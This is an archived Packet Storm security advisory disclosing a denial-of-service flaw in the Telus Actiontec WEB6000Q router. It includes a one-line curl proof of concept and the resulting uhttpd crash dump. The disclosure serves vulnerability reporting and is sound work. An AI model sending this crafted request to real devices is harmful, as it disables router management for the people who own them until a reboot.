what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Telus Actiontec WEB6000Q Denial Of Service

Telus Actiontec WEB6000Q Denial Of Service
Posted Jun 12, 2019
Authored by Andrew Klaus

Telus Actiontec WEB6000Q with firmware 1.1.02.22 suffers from a denial of service vulnerability. By querying CGI endpoints with empty (GET/POST/HEAD) requests causes a Segmentation Fault of the uhttpd webserver. Since there is no watchdog on this daemon, a device reboot is needed to restart the webserver to make any modification to the device.

tags | exploit, denial of service, cgi
SHA-256 | b7e77c13720ff2862b5f2cd505e2fd83433bb92406f790f5a82bf75578c329dd

Telus Actiontec WEB6000Q Denial Of Service

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

### Device Details
Discovered By: Andrew Klaus (andrew@aklaus.ca)
Vendor: Actiontec (Telus Branded)
Model: WEB6000Q
Affected Firmware: 1.1.02.22

Reported: July 2018
CVE: Not needed since update is pushed by the provider.


### Summary of Findings
By querying CGI endpoints with empty (GET/POST/HEAD) requests causes a
Segmentation Fault of the uhttpd webserver. Since there is no watchdog
on this daemon, a device reboot is needed to restart the webserver to
make any modification to the device.

### Proof of Concept:

$ curl -X POST -ik https://192.168.1.2/forgot_password.cgi
curl: (52) Empty reply from server

$ curl -X POST -ik https://192.168.1.2/forgot_password.cgi
curl: (7) Failed to connect to 192.168.1.2 port 80: Connection refused


### UART console output after attack:

<4>[ 726.578000] uhttpd/452: potentially unexpected fatal signal 11.
<4>[ 726.583000]
<4>[ 726.585000] Cpu 1
<4>[ 726.587000] $ 0 : 00000000 10008d00 00000000 00000000
<4>[ 726.592000] $ 4 : 00000000 00000000 00000000 00000000
<4>[ 726.598000] $ 8 : 81010100 3d3d3d3d 77a00000 f0000000
<4>[ 726.603000] $12 : 00000001 6570743a 202a2f2a 00416b5c
<4>[ 726.608000] $16 : 00000000 00000000 00000000 7fe14ebe
<4>[ 726.614000] $20 : 00404c84 775168a0 0046d470 0084ee6c
<4>[ 726.619000] $24 : 00000186 00411030
<4>[ 726.624000] $28 : 00464620 7fe12800 7fe12800 00416c20
<4>[ 726.630000] Hi : 000000c9
<4>[ 726.633000] Lo : 0001e791
<4>[ 726.636000] epc : 00411078 0x411078
<4>[ 726.640000] Tainted: P
<4>[ 726.643000] ra : 00416c20 0x416c20
<4>[ 726.647000] Status: 00008d13 USER EXL IE
<4>[ 726.652000] Cause : 00000008
<4>[ 726.655000] BadVA : 00000000
<4>[ 726.657000] PrId : 0002a080 (Broadcom BMIPS4350)
<4>[ 726.663000]
<4>[ 726.663000] Userspace Call Trace: process uhttpd, pid 452, signal
11
<4>[ 726.671000] [<00411078>] /sbin/uhttpd
<4>[ 726.674000] [<00416c20>] /sbin/uhttpd
<4>[ 726.678000] [<00416d68>] /sbin/uhttpd
<4>[ 726.682000] [<00407cd4>] /sbin/uhttpd
<4>[ 726.686000] [<00416c20>] /sbin/uhttpd
<4>[ 726.689000] [<0047cb94>] (unknown)


-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEE/rRUDraOzqmrp8tZoyRid8jQfpkFAlz9T/cACgkQoyRid8jQ
fpl0pQ/8Cy5KVRr9A21pitkXvN4tfSg2xLW3JPCM5u9YTVyat8/OXBJH4fFro0qg
lu47mquRCKEC98IqMfHDiiq7x75iAWTfGOtB3k9Kk4xfdtwdQP8yKy8do8dHr9No
FgmNh0+MFK0fvEju5hyzDDU7jBIAKAcjxQGU974B96ai+7p5yjm0rziwMVRK10UA
Bfc7kIZVAKTxvJkVtThBihkJ2+Szq33j+DwC1F64ePx++SZIJO+sHMY28MU/Kzdb
BmUUfhPQhla0pSZ1S1TTcOzNE+j7YrvQZ8mJ8fVJ7c/tOkG1u7xN/i8DpikF/46Z
nlmERr5wqRHvpsPsrmjEJPOnECRhcK9GRAlxiZJIXExzRv94hwJnGAMVXBqNw/81
GHhwnXW7efQpPNiuV9P9GnNiBuTL5I+eQR6aJn5rMl+h9em8+6YyU6Aguf+z5UJC
eBsaTRHIl6PReTCaBbZR7lOG2KqP485LM7bwDSFej0lRWStmrB624O48Qqr6wbDf
UW639RG4J7J1Qtoc+Gu8PgXcXWV9HY4KH1Edt4cSowveOn1LmQEsmFOeoBC5FKbQ
bIqB1uYTTjmO/ey/ysh2GbXkNym6xNJYa1RCZt+S0T0T/qPjPQa+IVO59lygQhtm
GHNRPP43+TkLyXhvWMjl4Ptat2b/gd99DMqO/VnLqrZEWD2rXx8=
=IEzI
-----END PGP SIGNATURE-----


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close